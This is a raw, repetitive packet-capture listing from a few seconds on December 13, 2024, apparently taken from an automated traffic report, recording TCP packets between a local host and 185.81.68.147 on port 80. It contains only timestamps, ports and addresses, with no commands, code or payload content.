                                                                                                                                                                Dec 13, 2024 01:37:13.981848955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.982018948 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.982114077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.982727051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.982861042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.982928991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.983661890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.983767033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.983911991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.984555960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.984672070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.984731913 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.985455036 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.985584021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.985702991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.986381054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.986486912 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.986623049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.987292051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.987397909 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.987488031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.988226891 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.988300085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.988357067 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.989131927 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.989217043 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.989370108 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.990020037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.990159988 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.990328074 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.990953922 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.991048098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.991110086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.991854906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.991969109 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.992152929 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.992738962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.992789030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.992854118 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.993680000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.993828058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.993890047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.994586945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.994674921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:13.995179892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:13.995470047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.035913944 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.139760017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.139790058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.139910936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.140117884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.140224934 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.140741110 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.141041040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.141144037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.141707897 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.141936064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.142081022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.142143965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.142852068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.142956972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.143354893 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.143755913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.143872023 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.143928051 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.144663095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.144774914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.144871950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.145591021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.145709038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.145767927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.146501064 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.146608114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.147386074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.147440910 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.147507906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.147573948 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.148320913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.148495913 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.148550034 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.149213076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.149415016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.149477959 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.150125027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.150238991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.150294065 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.151045084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.151148081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.151205063 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.151945114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.152072906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.152185917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.152864933 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.152956963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.153011084 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.153795958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.153872967 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.153925896 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.154685020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.154788017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.154849052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.155611038 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.155709982 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.155802011 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.156486034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.156608105 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.156656981 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.157412052 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.157519102 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.157644033 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.158315897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.158418894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.158519983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.159216881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.159306049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.159363985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.160142899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.160248995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.160305023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.161042929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.161153078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.161287069 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.161940098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.162111044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.162168980 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.162873983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.162987947 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.163129091 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.163772106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.163886070 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.163966894 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.164664030 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.164791107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.164843082 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.165589094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.165695906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.165745974 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.166531086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.166623116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.166786909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.167402029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.167576075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.167627096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.168338060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.168442965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.168497086 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.169220924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.169348001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.169409990 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.170150042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.170260906 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.170312881 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.171063900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.171161890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.171231985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.171952009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.172039986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.172557116 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.172857046 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.172913074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.172961950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.173768997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.173883915 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.173944950 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.174685955 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.174799919 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.174865007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.175596952 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.175704956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.175753117 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.176496983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.176619053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.176742077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.177417994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.177558899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.177624941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.178358078 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.178450108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.179039001 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.179229021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.179347992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.179398060 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.180155993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.180262089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.180322886 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.181066990 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.181202888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.181252956 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.181965113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.182084084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.182252884 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.182861090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.182970047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.183026075 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.183784008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.183897018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.183948040 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.184680939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.184784889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.184849977 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.185604095 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.185705900 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.185755014 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.186517954 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.186621904 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.186806917 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.187381983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.239042044 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.331568003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.331722021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.332005978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.332072020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.332076073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.332201958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.332705975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.332809925 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.332871914 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.333611012 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.333662987 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.333853006 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.334523916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.334609985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.334682941 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.335582018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.335758924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.336222887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.336339951 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.336461067 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.336524010 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.337269068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.337372065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.337424994 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.338169098 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.338280916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.338799000 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.339068890 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.339174986 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.339231968 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.339975119 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.340044975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.340734959 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.340897083 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.341017008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.341069937 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.341814995 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.341945887 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.342722893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.342777967 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.342830896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.342941999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.343605042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.343713999 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.343910933 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.344527006 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.344640017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.344703913 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.345441103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.345560074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.345612049 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.346330881 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.346446991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.346506119 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.347269058 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.347363949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.347420931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.348155975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.348270893 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.348547935 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.349133968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.349298000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.349818945 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.350019932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.350156069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.350207090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.350907087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.351032972 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.351216078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.351814032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.351928949 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.351988077 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.352693081 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.352822065 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.352979898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.353626013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.353720903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.353780985 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.354533911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.354639053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.354692936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.355437994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.355566025 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.355634928 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.356333017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.356513977 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.356575012 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.357287884 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.357400894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.357453108 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.358163118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.358225107 CET8049707185.81.68.147192.168.2.5
